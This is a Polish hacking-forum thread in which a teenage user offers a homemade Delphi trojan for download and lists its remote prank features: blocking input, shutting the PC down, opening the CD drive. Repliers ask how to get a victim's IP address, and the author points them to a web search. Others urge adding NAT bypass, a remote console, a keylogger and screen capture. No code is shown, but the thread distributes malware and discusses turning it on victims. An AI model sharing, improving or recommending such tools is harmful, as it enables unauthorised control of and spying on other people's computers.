Courage Trojan 1.0

HotSauce..!

Użytkownik
Dołączył
Luty 9, 2008
Posty
2
Witam iz jest to moj pierwszy post na tym forum chciałbym sie przedstawic. Imie Wojtek lat 13 ,interesuje sie programowaniem.

Na tą okazje ze jestem tu pierwszy raz chcialbym przedstawic wam mojego trojana .



Jest to trojan wykonany w Object Pascal'u , prosty w obsłudze , nie działa za NATem.

Jest zrobiony bardziej dla zabawy posiada funkcje takie jak odgrywanie dźwięków , wyłaczania kompa etc.,
otwieranie CD, otwieranie www, blokowanie klawiatury , blokowanie myszki , ukrycie kursora , blokowanie altctrldel , granie melodyjek na glosniku systemowym etc.

tutaj screen:
couragebysauce.png


<a href="http://www.sendspace.com/file/f22jct" target="_blank">
download</a>

Wykrywalnosc

Wszelkie bugi prosze zgłaszac na pw .
<
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
wiem maruda ze mnie .... ale zabawki nie sa przydatne. funkcjonalnosc ocenilbym niestety na 0 ..... zeby chociaz byla konsola.
 

HotSauce..&#33;

Użytkownik
Dołączył
Luty 9, 2008
Posty
2
<div class='quotetop'>CYTAT(grzonu @ 6.03.2009, 18:39) <{POST_SNAPBACK}></div>
wiem maruda ze mnie .... ale zabawki nie sa przydatne. funkcjonalnosc ocenilbym niestety na 0 ..... zeby chociaz byla konsola.[/b]

No wiem ze trojan niezbyt. W sumie to jest moj pierwszy projekt w delphi ale poucze sie jeszcze i wydziobie cos lepszego
smile.gif



<div class='quotetop'>CYTAT(romet_pl @ 6.03.2009, 21:14) <{POST_SNAPBACK}></div>
Przepraszam, a skąd mam znać ip ofiary?
<
[/b]


http://www.google.pl/search?q=jak+zdobyc+ip+ofiary
 

Gondoller

Użytkownik
Dołączył
Luty 21, 2008
Posty
259
wiesz, to jest trojan-zabawka, nikt oprócz dzieci w twoim wieku i ludzi z rozstrojona psychą ię nim nie zainteresuje... a te osoby raczej nie poradzą sobie z wyciąganiem ip ofiary, dodaj do tego jeszcze np. neostrade itp. - za każdym razem moze być inne. Przemyśl to, szkielet masz, zmontuj coś co jest funkcjonalne, bez tych bzdetów
 

romet_pl

Użytkownik
Dołączył
Grudzień 5, 2008
Posty
16
Trojan wygląda przyjemnie, jednak wiesz zdobyć ip od osoby która nie wie co to mozilla to ...

Na przyszłość zrób lepiej obsługę przez GG
smile.gif
 

proxima

Były Moderator
Dołączył
Marzec 9, 2007
Posty
651
Ucz się nadal i staraj się doskonalić swoje programy.
Uwag słuchaj tylko od tych, którzy potrafią coś mądrego doradzić lub zasugerować, a na pewno nie od takich co już zapomnieli jakie bywają początki i próbuja sie wymadrzać poprzez zniechęcanie

pozdrawiam
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
oj ... do mnie pijesz
smile.gif

wiem jakie sa poczatki ale wiem tez ze oceniac nie nalezy wzgledem czy poczatkujacy czy zaawansowany
ale wzgledem funkcjonalnosci w tym przypadku.
nie mam zamiaru nikogo zniechecac tylko mowie ze to jeszcze nie jest to. Czasem lepiej wytknąc wszystkie błędy i potem widziec jak osoba je naprawi i bedzie cos obiecujacego,niz pochwalić i praca nad projektem sie konczy.

Wiec jak dla mnie w trojanie brakuje jak juz ktos wspominal omijania NAT`u i dostepu do konsoli, ew. keyloggera i screena.
Pracuj a nastepna wersja bedzie lepsza.
 

Zero Super

Użytkownik
Dołączył
Listopad 24, 2009
Posty
12
Ey a wam to dziala?
Ja probowalem na kilka sposobow...
Z mojej wlasnej sieci, ode mnie do innego neo, ode mnie do radiowki, ode mnie z radiowki
I ani razu nie zadzialalo...
 

haxs

Użytkownik
Dołączył
Lipiec 29, 2007
Posty
35
aż mnie śmiech wziął, jak przeczytałem jakie funkcje posiada :D
a 'courage' to po francusku odwaga, duch, męstwo, otucha
 

hxv

Były Moderator
Dołączył
Sierpień 9, 2006
Posty
797
To może zaprezentujesz coś lepszego od siebie? No ale po co się wysilać, można odkopać parę tematów i nabić sobie parę postów, co?
 
Do góry Bottom